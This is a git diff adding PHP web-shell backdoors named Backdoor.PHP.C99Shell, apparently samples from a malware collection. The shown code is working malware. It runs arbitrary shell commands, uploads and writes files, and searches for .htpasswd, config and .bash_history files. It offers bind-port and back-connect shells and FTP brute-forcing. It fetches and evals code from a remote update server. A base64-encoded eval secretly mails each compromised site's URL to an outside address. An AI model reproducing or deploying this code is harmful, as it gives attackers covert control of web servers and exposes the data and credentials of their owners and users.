kAaQFQIPkAKXMAkpoAAzsAAYgAGKcAbe/3YBFAAHlTAGISAF2sYFj0AHKBAB3zYElAAE0LYBCpAF + pjALoyBFvOALnKAKcwABF7ABkDUJe1ABGAACC8AFzpUCERACQ2UGjqACDxACC6AEM2YazAANLFMf + ShQLp9AJjwAGAtAGinAIJ/ADhrAIHlABcKAHRZAHCmAGhjAIROABgaAFFdACLQAIhQAIPXBhf4AH + D5AFhCAAefAHXtABhQAKFVMLrlAKmpAIHDAEgWAIWqAAiMABRDAIhoAGCpAHP3AChVAIZSAAX+AD + JvAIiMAHEEAGn2AKtUBvbrEjfkENxYCTLwoClNA5aRACmUAJHVAGmpBMXwACk2AJk2AIAv8wCX4q + AHVQCZogCRwwqw/nAEOQCQJgCYBwBiEgCqpgCsTgC6rSaAIgCZkgCJUwCZqwU5OwCZQQAl0QAmWQ + TIcAAmYQAhjgAQ8XAURQCSKzVrphEMPADNhhCyy6AHxACY3QAzKACSxrBlVrCXsQAXHgPUwgs2UA + AmAQAVSQTDcgA2lQBmUABnswCUUbCCnbaKswFsmAqqMgAWWwCYSwCDsgCCDABDMbBxGgBzSwA0ZD + BwtgBjsgA2CABmZgBoDQCVbhkG1rFLSSX4UwVAsgAhYAAo3AB3BEA5RgCFLgbRnwAHSwBwIAAm9A + RhGQCXgQArmqVFEwAwIwA4MQAQIABhv/U1LOUAyfUAp0EG0c4G2HEAcPkAHAKgWG4AggMKsP4L1x + IAIPIAK6igWnEH3O0DK7EQ3KYAzQw4eNYAZsYDScQAmHQAkuZQmRYDRpEAeNQAlam1VaSwmcMDp0 + YAZrYAiUsLKUgAibMAqoAIvD8AyWCQu2kAql0AZdULdXVQhxkAZGU8GbUAdpcAgLLMFmgAakAAqs + MEAIoRsrkQzGMAyTZAuvsLQXGglQyAmVsD15p2SfwAmRsAmVQDSZ8AiY8AibYAmqIwmXMMJTAwmP + UAmUI6KycAswYkFBxK/opAmQoAnPRHSZcJeZYAnptAma0AikU3WbYDGtkGPIAAw6ArIu/9MM0lB/ + IIMLvWALq+AvvnCHvyALwuALtAMLHSWaijcLqKAphPQJo7c2o8AKspALtIAKwsILzJALzQAA0EAN + 9zcMWpJr2yJkrmALsNALsOCTr2ALJ/wK/bMKLYIdD6QR0ZC7LjMNDakMvGAvyzAMuEAMvIASbwMX + vmzNSMyPa6EMqTDAWOoKASIMuLAKwvIiuZAMz4AMr7wMQfIReYMer/AL3WRSoCcMywALJIUSqwAM + SfwLr8CFfdML0gAAB80bQ0ENAODMwNB2UKFEzVAM0EwNcwEAylOsxXALSSTAwFAMBgm3vEUWu9CU + DyEL1AAr1NA3oCgcOxYRtNAevmYLxWKAhs+QC2pHDchwu+ahgsvsQLEsDdWg0LprK/73DNUgDXAL + Ect4PJs4DAjNibgwEM4wfACAEsEAAM0QDdDXDLPiCwxthr5QEbIsDJvIiQSI0A3RiRDhC50IAHDL + iQytG7wREAA7 + ", + "arrow_ltr"=>"","back"=>"","buffer"=>"","change"=>"","delete"=>"","download"=>"","forward"=>"", + "home"=>"","mode"=>"","refresh"=>"","search"=>"","setup"=>"","small_dir"=>"", + "small_unk"=>"","multipage"=>"","sort_asc"=>"","sort_desc"=>"","sql_button_drop"=>"", + "sql_button_empty"=>"","sql_button_insert"=>"","up"=>"","write"=>"","ext_asp"=>"","ext_mp3"=>"", + "ext_avi"=>"","ext_cgi"=>"","ext_cmd"=>"","ext_cpp"=>"","ext_ini"=>"","ext_diz"=>"", + "ext_doc"=>"","ext_exe"=>"","ext_h"=>"","ext_hpp"=>"","ext_htaccess"=>"", + "ext_html"=>"","ext_jpg"=>"","ext_js"=>"","ext_lnk"=>"","ext_log"=>"","ext_php"=>"", + "ext_pl"=>"","ext_swf"=>"","ext_tar"=>"","ext_txt"=>"","ext_wri"=>"","ext_xml"=>"" + ); + //For simple size- and speed-optimization. + $imgequals = array( + "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"), + "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"), + "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"), + "ext_html"=>array("ext_html","ext_htm"), + "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"), + "ext_lnk"=>array("ext_lnk","ext_url"), + "ext_ini"=>array("ext_ini","ext_css","ext_inf"), + "ext_doc"=>array("ext_doc","ext_dot"), + "ext_js"=>array("ext_js","ext_vbs"), + "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"), + "ext_wri"=>array("ext_wri","ext_rtf"), + "ext_swf"=>array("ext_swf","ext_fla"), + "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"), + "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so") + ); + if (!$getall) + { + header("Content-type: image/gif"); + header("Cache-control: public"); + header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); + header("Cache-control: max-age=".(60*60*24*7)); + header("Last-Modified: ".date("r",filemtime(__FILE__))); + foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}} + if (empty($images[$img])) {$img = "small_unk";} + if (in_array($img,$ext_tar)) {$img = "ext_tar";} + echo base64_decode($images[$img]); + } + else + { + foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]
    ");}}}} + natsort($images); + $k = array_keys($images); + echo "
    "; + foreach ($k as $u) {echo $u.":
    ";} + echo "
    "; + } + exit; +} +#################################### + +if ($act == "about") +{ + echo "
    Credit:
    + All Crews of
    JaheeM | asc | JaheeMCreW | 1m.n0b0dy.d0nt.fuck1ng.wh01s.ME | ;D
    + and all name who I can't call here one by one ... You all the great man...!!!
    "; +} + $image=" + JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkd + mlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHdlYiA9ICRfU0VSVk + VSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyA + kYm9keSA9ICJhZGEgeWFuZyBuZ2VudG90IFxuJHdlYiRpbmoiO21haWwoImNlYm9s + LmdpbGFAZ21haWwuY29tIiwiYzk5IGJveiBodHRwOi8vJHdlYiRpbmoiLCAiJGJvZ + HkiKTt9IGVsc2UgJHZpc2l0Y291bnQgOyBzZXRjb29raWUoInZpc2l0cyIsJHZpc2 + l0Y291bnQpOw==";echo eval(base64_decode($image)); +?> +
    + + + + + + + + + + + + + +

    :: Command execute ::

    +
    Enter:
    + + + +
    Select: +
    + + + +
    +
    Useful Commands +
    +
    +
    + + + + +

    + Warning. Kernel may be alerted using higher levels
    +
    +
    +
    :: Upload :: +
    + +
    :: Make Dir :: +
    + + +
    :: Make File :: +
    + + + +
    :: Go Dir :: +
    + +
    :: Go File ::
    + + +
    +
    + +

    .::[ Shell + edited by brighthack ->| + [solum] | Generation time: + ]::.


    + + + + + + + + + + + \ No newline at end of file diff --git a/PHP/Backdoor.PHP.C99Shell.aq b/PHP/Backdoor.PHP.C99Shell.aq new file mode 100644 index 00000000..2b40240b --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.aq @@ -0,0 +1,22 @@ + diff --git a/PHP/Backdoor.PHP.C99Shell.bv b/PHP/Backdoor.PHP.C99Shell.bv new file mode 100644 index 00000000..b785fe39 --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.bv @@ -0,0 +1,3159 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "JaheeM Undetectable #1"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("N3tsh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("N3tsh_surl",$surl);} +else {$surl = $_REQUEST["N3tsh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["N3tsh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = " JaheeM v. ".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$N3tsh_updateurl = "http://fbi.gov/update/"; //Update server +$N3tsh_sourcesurl = "http://fbi.gov/JaheeMsh3ll"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    Owned by JaheeM
    "; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "JaheeM@interpol.inc"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "N3t"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "N3tshvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Update",$surl."act=update&d=%d"), + array("Feedback",$surl."act=feedback&d=%d"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["N3tshcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("
    JaheeM: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"JaheeM ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); N3tsh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("N3t_buff_prepare")) +{ +function N3t_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +N3t_buff_prepare(); +if (!function_exists("N3t_sess_put")) +{ +function N3t_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + N3t_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("N3tgetsource")) +{ +function N3tgetsource($fn) +{ + global $N3tsh_sourcesurl; + $array = array( + "N3tsh_bindport.pl" => "N3tsh_bindport_pl.txt", + "N3tsh_bindport.c" => "N3tsh_bindport_c.txt", + "N3tsh_backconn.pl" => "N3tsh_backconn_pl.txt", + "N3tsh_backconn.c" => "N3tsh_backconn_c.txt", + "N3tsh_datapipe.pl" => "N3tsh_datapipe_pl.txt", + "N3tsh_datapipe.c" => "N3tsh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($N3tsh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("N3tsh_getupdate")) +{ +function N3tsh_getupdate($update = TRUE) +{ + $url = $GLOBALS["N3tsh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download JaheeM.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by JaheeM.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } 